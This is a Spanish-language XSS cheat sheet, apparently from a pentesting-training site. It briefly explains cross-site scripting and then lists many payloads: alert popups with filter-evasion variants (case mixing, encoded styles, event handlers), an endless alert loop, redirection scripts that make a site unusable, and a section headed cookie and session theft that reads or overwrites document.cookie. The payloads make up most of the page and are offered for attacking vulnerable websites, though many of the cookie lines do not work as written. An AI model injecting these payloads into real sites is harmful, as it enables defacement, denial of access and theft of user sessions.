XSS

“Una vulnerabilidad es tan limitada como tu quieras que sea”
El Cross Site Scripting (XSS) es una vulnerabilidad muy común hoy en día, se puede encontrar en la mayoría de las aplicaciones web en Internet.
Esta vulnerabilidad se debe a que el código HTML se interpreta en el navegador de un usuario y no en el Servidor. Así que si alguien inyecta código HTML en alguna aplicación web no podría hacer daño alguno al servidor, ya que éste nunca interpreta el código HTML, solo los navegadores. Por eso este ataque se determina: “ataque del lado del cliente”. El XSS se puede utilizar para hacer phishing, robo de credenciales, troyanizar navegadores, o simplemente para hacer un deface. Todo depende de la página. A continuacion vemos una serie de filtros y ejemplos XSS orientados ataques de penetracion a sitios web Vulberables a XSS

Mensaje de alerta XSS
Con este código se generará un mensaje de alerta en toda la página vulnerable, el mensaje es modificable:

<script>alert("XSS");</script>

<IMG SRC="javascript:alert('XSS');"> <img src=javascript:alert('XSS')> <img src=JaVaScRiPt:alert('XSS')> <img src=javascript:alert("XSS")> <img src=`javascript:alert("RM'XSS'")`> <img src="jav ascript:alert('XSS');"> <img src="jav ascript:alert('XSS');"> <img src="jav ascript:alert('XSS');"> <img DYNSRC="javascript:alert('XSS')"> <img LOWSRC="javascript:alert('XSS')"> <img src='vbscript:msgbox("XSS")'> <div style="background-image: url(javascript:alert('XSS'))"> <div style="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> <div style="background-image: url(
javascript:alert('XSS'))"> <div style="width: expression(alert('XSS'));"> <body background="javascript:alert('XSS')"> <body ONLOAD=alert('XSS')> <body onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> <table background="javascript:alert('XSS')"> <table ><td background="javascript:alert('XSS')">

Alerts interminables mediante un ciclo for infinito.

<script>for (;;) alert("XSS infinito");</script>

Redirección XSS
Para realizar una redirección y hacer que una web resulte inaccesible, podemos probar utilizando document.location, window.location, location.assign y location.replace, todo generaría el mismo resultado de redirección:

<script>document.location.href = "https://www.facebook.com/BackTrackAcademy";</script> <script>window.location = "https://www.facebook.com/BackTrackAcademy";</script> <script>location.assign("https://www.facebook.com/BackTrackAcademy");</script> <script>location.replace("https://www.facebook.com/BackTrackAcademy");</script>

Robo de cookies y sesiones
A través de la propiedad document.cookie podemos sacar la cookie que está utilizando el usuario:

<br><br> <script language="javascript">alert("XSS Cookie: " + document.cookie);</script> <IMG SRC="javascript:document.cookie=true;"> <img DYNSRC="javascript:document.cookie=true;"> <img LOWSRC="javascript:document.cookie=true;"> <img STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)"> <iframe src="javascript:document.cookie=true;> <INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;"> <BODY BACKGROUND="javascript:document.cookie=true;"> <BODY ONLOAD=document.cookie=true;> <BGSOUND SRC="javascript:document.cookie=true;"> <BR SIZE="&{document.cookie=true}"> <LINK REL="stylesheet" HREF="javascript:document.cookie=true;"> <TABLE BACKGROUND="javascript:document.cookie=true;"> <DIV STYLE="background-image: url(javascript:document.cookie=true;)"> <DIV STYLE="background-image: url(
javascript:document.cookie=true;)"> <DIV STYLE="width: expression(document.cookie=true);"> <STYLE TYPE="text/javascript">document.cookie=true;</STYLE> <STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A> <STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE> <iframe src="javascript:document.cookie=true;> <div onmouseover="document.cookie=true;"> <div style="background-image: url(javascript:document.cookie=true;);"> <div style="width: expression(document.cookie=true;);"> <body onload="document.cookie=true;"> <iframe src="javascript:document.cookie=true;>

Codificación de Caracteres

ASCII Text:

Ingresa tu Codigo XSS

Hex Value:

URL:

HTML:

Decimal Value:

HTML:

Base64 Value

Base64: